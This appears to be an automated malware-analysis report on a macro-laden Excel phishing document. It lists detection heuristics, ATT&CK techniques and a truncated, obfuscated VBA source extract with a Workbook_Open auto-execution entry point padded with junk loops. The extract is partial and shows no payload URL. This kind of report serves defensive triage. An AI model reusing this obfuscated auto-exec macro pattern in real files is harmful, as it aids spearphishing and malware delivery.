MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1047 WMI
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes a Shell() call and CreateObject, indicating it is designed to execute arbitrary code. The presence of a 'macros.bas' file and the 'OLE_VBA_SHELL' heuristic strongly suggest the macro's purpose is to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.Agent-6923047-0' further supports its malicious nature.
Heuristics (7)
- ClamAV: Doc.Trojan.Agent-6923047-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Agent-6923047-0
- VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro [high] (OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16340 bytes |

SHA-256: fcc5d7c80d0cd152894f59e6b1effaf5e514e58424ac1140c9acc452c69c6665
Detection (ClamAV): No threats found
Obfuscation or payload: likely. Carved artifact contains 5 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
AF1AcXeqVm.wCIXtRaOcpx3i_meaczh
While 25 = 4321
Dim VEZc1Ut2Ps_1hrFyl8xtKTGNrU5O7kRGoeZqkogWhi8sk6T13x As Variant
Wend
Dim cn_UA7JudZd4 As Integer
While 6 = 9961
Dim oY6KCPXL7ZZKlUXmu_CUGqyciHXtY3B7CnQSntQ As Variant
Wend
Dim jck6CM2sohg As Integer
While 20 = 8289
Dim dVGu8jak31nvCWbH7C_8Arb2fuuNqXsK As Variant
Wend
Dim gi43SrLHWryx3 As Integer
While 23 = 7957
Dim ntrvlch9u3ONKxL3cGb4Hz3MDrUu1StCr2Ec8lFqR4uonmG39N As Variant
Wend
Dim jU3sx1dq3FwFZHL As Integer
While 9 = 8081
Dim eSqr41_tkNDLiYjaulYHpxGPkc4LjdvTfaGwJOSBikQ As Variant
Wend
Dim ctn4QRoAd_ As Integer
While 21 = 513
Dim eqJYFY6wIEaroGQwOdQWi_enf7ik45bQSf6YkuH3_vZ As Variant
Wend
Dim KBA9v_dXfLlY As Integer
While 22 = 6283
Dim YJf3IzS2NlIXGK1JdUWQvmSkd7vkXe6_pFeN_19Ct4Kh1lzjGS4IxSlu14 As Variant
Wend
Dim XKDrbroDqAo As Integer
While 22 = 6481
Dim lEmUTg2Ztt2FJb_kuOVcsVIbw8BZb3w4x4eMPxcvtTEIeD2N As Variant
Wend
Dim WF3xTg6N5IgU As Integer
While 28 = 900
Dim eZ7168QP7zS7vjsXP_6rEvCU98iP8OREOGPRVMLguk As Variant
Wend
Dim Pfv6Bswf85MyN As Integer
While 26 = 922
Dim rWk27WAQqgMpmSYBBvX6deehC6ybZQ As Variant
Wend
Dim V1Z2g5tUNH As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AF1AcXeqVm"
Dim unKSlBRVkVwhWCCbOt544_24M8bvCv1nACrGNCzxyy7CDKhc3QoQyKDpvP_mifRxdGgSS5ML4FD_FxzBX82uFixx9BU77KMReHg5nNH8CbW As String
Function tRi9hNWYWd5Gy2tL1CxAhgzYIUNuucPpf(Mn6aQsNrt4qNeyCwBiMQc6hW87fNYk98ywyHknndL_hbiRVNpNdhA1bQEhcSL9RH5sXq_4KW4r_bV_xnjQhIEY68SfCCJTQMqYgz3nMvCFnQv94_sxs5YGBdvZWbzHKhY1u6g7u6CuF)
While 16 = 418
Dim JwRZPU_hPvwjc1ca6W6WnL2JxEtAEj As Variant
Wend
Dim B3ggP3oEfJmbW As Integer
While 2 = 2226
Dim DQjHHzoiFZI75GkIjDao2uq6SLgPQXK_tcEfek1O5T4aViUuC66 As Variant
Wend
Dim FJweRiny6QXPq As Integer
While 21 = 3674
Dim NILZA_n9KKtgzNht1uMUbDx68w6zu57e As Variant
Wend
Dim CLLLU4t7Q6 As Integer
Dim gzuDqSMfWqULgi_8MB9TZ585QvWR87ePF62DtxyJJaQgMlDaGcU3S9jl2zv555gYKD_jq5MXKwH8lYpnq5Idkl7GUNK3A4NO32UHfbtLO6pezk_bHFL_tCxhE7NasSVQg2_tCgGNI7
While 7 = 7839
Dim B8bT___eJ5NITObLHwMPNMcmBUW6AODfHy4_Tktp As Variant
Wend
Dim zZTF8C1_afwcqmt As Integer
While 24 = 6502
Dim xcyQsqGd41qAeUb2gBgZw3Vo8cQddbixdD_eeRA8q6YOOAUs9mNZI As Variant
Wend
Dim L75FIRNXm_aQ2e As Integer
While 2 = 2941
Dim ZO6VNAhrzbFX7GgezLGnPFIXU9uiD68 As Variant
Wend
Dim Vd4bBP_Ykc As Integer
Dim mNF8jZgdFC_7pewDaH_QKEsp95I7ne_6dFidtYjMeFWYaagajZ7Z5f2geY9oOjykBHbi5RSA
While 25 = 7535
Dim Ea_tUF1FHNHMNR_gAOO9m3cHAaM_bhK As Variant
Wend
Dim rBv_rXjlnr6vsx As Integer
While 17 = 366
Dim HOjWdOtHlzL7zr42umjBZJaRVGYlkPqEtT2Jlp8RahY6wtg1 As Variant
Wend
Dim qu6QKpV7xQ_Uy As Integer
While 18 = 3930
Dim FgUGELezsO_oPi1uddkjg4zTX4D74UTokbTADwqgAA8 As Variant
Wend
Dim dzl4EeKRvW As Integer
While 6 = 3426
Dim tQKp_sJGh6V5XCxNyppwDif6Tcu_7ZrBgQ1JGTCC As Variant
Wend
Dim eXaDkiah_1pd As Integer
While 25 = 1942
Dim l9SJtOUf
... (truncated)